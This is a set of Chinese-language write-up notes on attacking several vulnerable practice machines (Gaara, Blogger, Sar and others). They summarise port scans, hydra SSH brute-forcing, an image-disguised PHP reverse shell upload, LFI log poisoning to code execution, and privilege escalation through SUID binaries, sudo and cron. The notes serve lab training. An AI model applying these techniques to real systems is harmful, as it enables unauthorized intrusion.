authorized_keys 檔案位於 .ssh 目錄下,用於儲存允許 SSH 登入的公鑰。當你嘗試通過 SSH 連接到伺服器時,伺服器會檢查你提供的私鑰是否對應到 authorized_keys 中的公鑰,如果匹配,則允許你登入。
ssh進去另一位user之後找了一下suid沒啥,之後sudo -l 看到有可以利用的,之後就get root
Gaara
port scan 全部的結果只有22 80 port,web打開只有一張圖,啥都沒有用dirb掃掃不到任何有用東西用
/usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt 這個字典檔差不多要掃到最後才有結果,找到/Cryoserver,網頁打開是白的
一開始以為是廢頁,繼續爆下去,跑了上面字典檔啥都沒有回來這個頁面看翻仔細才發現在最下面有東西…
之後進去其中一個目錄
總而言之就是得到人名Gaara,用hydra 爆破ssh登入
user flag直接拿不多說,root flag 就先找SUID之後去gtfobins找到gdb 可以利用
Blogger
port scan result
┌─[root@G]─[/home/parrot] └──╼ #nmap -sS -Pn -sC 192.168.165.217 --top-ports=20 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 14:02 CST Nmap scan report for blogger.pg (192.168.165.217) Host is up (0.071s latency).
PORT STATE SERVICE
21/tcp closed ftp
22/tcp open ssh
| ssh-hostkey:
| 2048 95:1d:82:8f:5e:de:9a:00:a8:07:39:bd:ac:ad:d3:44 (RSA)
| 256 d7:b4:52:a2:c8:fa:b7:0e:d1:a8:d0:70:cd:6b:36:90 (ECDSA)
|_ 256 df:f2:4f:77:33:44:d5:93:d7:79:17:45:5a:a1:36:8b (ED25519)
23/tcp closed telnet
25/tcp closed smtp
53/tcp closed domain
80/tcp open http
|_http-title: Blogger | Home
110/tcp closed pop3
111/tcp closed rpcbind
135/tcp closed msrpc
139/tcp closed netbios-ssn
143/tcp closed imap
443/tcp closed https
445/tcp closed microsoft-ds
993/tcp closed imaps
995/tcp closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5900/tcp closed vnc
22、80port open
去看web 網頁沒什麼料都前端
去用dirb找到/assets/ 進去後發現它Directory traversal,翻一翻找到assets/fonts/blog/裡面任何一篇文章點進去下面有地方可以上傳,傳一個php_reverse_shell上去改檔名為圖檔檔名發現才是被filter,於是去改檔案內容增加GIF89a,上傳成功RCE後執行
python3 -c 'import pty; pty.spawn("/bin/bash")'
這裡一定要/bin/bash才能有完整的termnail功能/bin/sh不能
以便好使用
嘗試過很多方法都無法提權,先從切換一般用戶開始,最後在嘗試切換vagrant密碼vagrant成功以vagrant的身分之後sudo su拿到root
CyberSploit1
80、22 port open
在網頁透過F12 看到下面註解得到username ,之後把robots.txt的base64 拿去decode
┌──(kali㉿G)-[~]
└─$ echo "Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=" | base64 -d
cybersploit{youtube.com/c/cybersploit}
得到一個flag,之後用rockyou 爆破登入ssh 發現不行,拿這個flag當作密碼成功登入
之後找到有linux kernel的版本可以利用,uname -r找到版本為3.13.0在searchsploit找到可利用的payload
Ha-natraj
這台靶機推,有學到有用的東西
22 80 port open
去網頁沒啥切入點,爆個目錄後找到/console這個目錄裡面有個file.php,ffuzing出在後面加上參數?file= 是一個LFI 嘗試用web log to RCE 失敗,還來在運用22 port 的log 成功RCE
之後這裡提權分兩階段,首先該找的找過後發現sudo -l有apache2 是可以運用的,檢查apache2 的config檔,
(先擱著root還敲不出來)
Sar
22 80 ports open
一開始網站沒啥東西爆一下目錄在robots.txt發現sar2HTML去察看後首先發現網站是有版本資訊,去exploit db 發現有RCE洞,用了這個exploit,RCE進去之後再攻擊端開一個web server,受害端下載php reverse shell 。
最後利用crontab,原本嘗試直接加一行 /bin/bash -i,結果不起作用於是就用既有的php reverse shell 在彈一次
SunsetNoontide
┌──(root㉿G)-[/tmp]
└─# nmap 192.168.151.120 -Pn -sS -T5 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-14 22:51 CST
Warning: 192.168.151.120 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.151.120
Host is up (0.084s latency).
Not shown: 65034 closed tcp ports (reset), 498 filtered tcp ports (no-response)
PORT STATE SERVICE
6667/tcp open irc
6697/tcp open ircs-u
8067/tcp open infi-async
Nmap done: 1 IP address (1 host up) scanned in 718.43 seconds
這台靶機很特別,研究了一下這是一個backdoor
